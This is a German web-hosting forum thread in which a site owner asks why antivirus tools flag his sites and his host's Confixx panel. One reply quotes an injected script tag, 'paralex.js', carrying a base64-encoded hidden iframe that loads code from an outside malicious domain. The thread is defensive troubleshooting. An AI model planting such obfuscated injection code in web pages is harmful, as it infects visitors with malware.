Malware-Warnung

[Pierre70]

Hallo zusammen,

keine Ahnung, ob ich mit meinem Anliegen im richtigen Forum bin....

Ich habe auf diversen Webseiten meines Hosters (celeros) auf einem bestimmten Sever seit 3-4 Wochen immer eine Malware-Warnung diverser AntiViren-Programme (in meinem Falle Avast).
Anfangs tat mein Hoster das ab mit "meine Seiten haben Schadcode oder sind komprommitiert worden"... doch blöderweise erscheinen die Warnungen auch beim Aufruf der Confixx-Seite des Hosters (Servers).

Es handelt sich um die Domains tippelsberg.de und hg-sys.de / bzw. um den Server "lennox.servertools24.de"

Die Warnmeldung erscheint nicht direkt bei Aufruf der ersten Seiten, sondern erst bei "Aktualisieren (F5)" oder Aufruf einer weiteren Seite innerhalb der Web-Präsenz.
Beim Aufruf der Confixx-Seite (lennox) erscheint die Meldung sofort.

Der Hoster kommt nicht wirklich in Wallung, das Problem zu beheben. Übrigens wurde das Problem auch schon von anderen Besuchern meiner Webseite bemerkt, siehe hier: http://www.mozilo.de/forum/viewtopic.php?f=19&t=1437 (ab Seite 3)

Kann mir/uns jemand helfen? Ist das ein Confixx-Fehler? Denn an meinen Seiten kann es nicht liegen.
Dasselbe CMS läuft nämlich auch auf anderen Servern des Hosters, und da kommen die Warnmeldungen nicht! (Siehe z.B. labor7.de/schreiner2)

Gruß aus Bochum,
Thorsten

[chichy]

Es finden keine Probleme beim aufrufen der Webseiten statt (Avast).
Schon in betracht gezogen, dass der heimische Rechner infiziert ist?

[Pierre70]

Ja, klar. Aber 9 verschiedene Rechner zeigen das Phänomen an?

[Mr. Brain]

Es handelt sich um die Domains tippelsberg.de und hg-sys.de / bzw. um den Server "lennox.servertools24.de"

Die Warnmeldung erscheint nicht direkt bei Aufruf der ersten Seiten, sondern erst bei "Aktualisieren (F5)" oder Aufruf einer weiteren Seite innerhalb der Web-Präsenz.
Beim Aufruf der Confixx-Seite (lennox) erscheint die Meldung sofort.

Es ist

Code:

<script src='/paralex.js?id=PGlmcmFtZSBzcmM9J2h0dHA6Ly9jeWJlci1mb3guY29tLzY2Ni9pbmRleC5waHAnIHN0eWxlPSdkaXNwbGF5OiBub25lJz4=;t=741'></script>

im Sourcecode zu finden. In der Tat wird das nicht immer im Sourcecode geladen.

[Pierre70]

@ Mr. Brain
Erscheint aber beim ersten Aufruf der Webseiten nicht, erst bei Aktualisierung bzw. Aufruf einer weiteren Seite der Präsenz. Und beim Aufruf der Confixx-Seite (lennox.servertools24.de) direkt.

Dieses "paralex.js" scheint mir sehr auf Confixx (Parallels) zu schließen.

[mtexx.com]

Das Script lädt Code von der Seite "cyber-fox.com" nach, die laut diversen Virenscannern tatsächlich schädlichen Code (JS:ScriptIP-inf [Trj]) enthält. Eventuell einfach mal "paralex.js" suchen & löschen und nach der Schwachstelle suchen, über die der Code nachgeladen werden konnte. Hier wird auf der Confixx Seite keine Warnmeldung ausgegeben.

MfG

[Web-Service4U]

Guten Morgen,

ich kann die Malware-Meldung von Avast für lennox.servertools24.de bestätigen. Wende Dich bitte an den Seitenbetreiber, da nur dieser den Schadcode entfernen kann.

Internette Grüße
Reiko

[Optimate-Server]

Was ich aber nicht verstehen kann:
Hier macht ein netter, höflicher Mensch einen Thread auf und fragt höflich, ob andere das Problem bestätigen können und sofort wird er unhöflich angegangen. Das muss in der Tat nicht sein!!
Und das der Threadstarter nicht daneben liegt, wie chichy anfangs behauptet, dass sein Rechner lokal infiziert sei, zeigt sich ja nun auch.

[mtexx.com]

Naja, beide haben sich nicht gerade "Nettiquette" verhalten... Jetzt ist nur die Frage, was Avast hier für einen Infekt anzeigt, bei mir bleibt die Meldung bei "lennox.servertools24.de" aus (ebenfalls fehlt hier das eingebundene Script) und auch Virustotal meint dazu "0/24": https://www.virustotal.com/url/8df02...aa73/analysis/. Kann jemand mal die genaue Meldung von Avast posten?

MfG

[Pierre70]

So, der Hoster hat sich auf meine Support-Mail noch nicht gemeldet.
Das Problem besteht weiterhin.

Andere Webseiten, die auf dem Server lennox.servertools24.de liegen, haben dasselbe Problem. Einfach mal nach "lennox.servertools24.de" googeln (sind aber auch viele Confixx-Blank-Seiten vorhanden).

Das CMS, das ich auf lennox für verschiedene Webseiten nutze, wird auch auf anderen Servern des Hosters von mir eingesetzt, so u.a. auf dem Server "lex" mit den Webseiten labor7.de/cnd und labor7.de/schreiner2 (2 Seiten, die im Kundenauftrag erstellt werden).
Bei diesen Seiten erscheint keine Malware-Warnung! Ebenso nicht auf wion-beats.de (selbes CMS, anderer Hoster).

Ich kann nicht ansatzweise etwas "verdächtiges" im Sourcecode meiner Seiten entdecken...

Es ist echt zum Verzweifeln...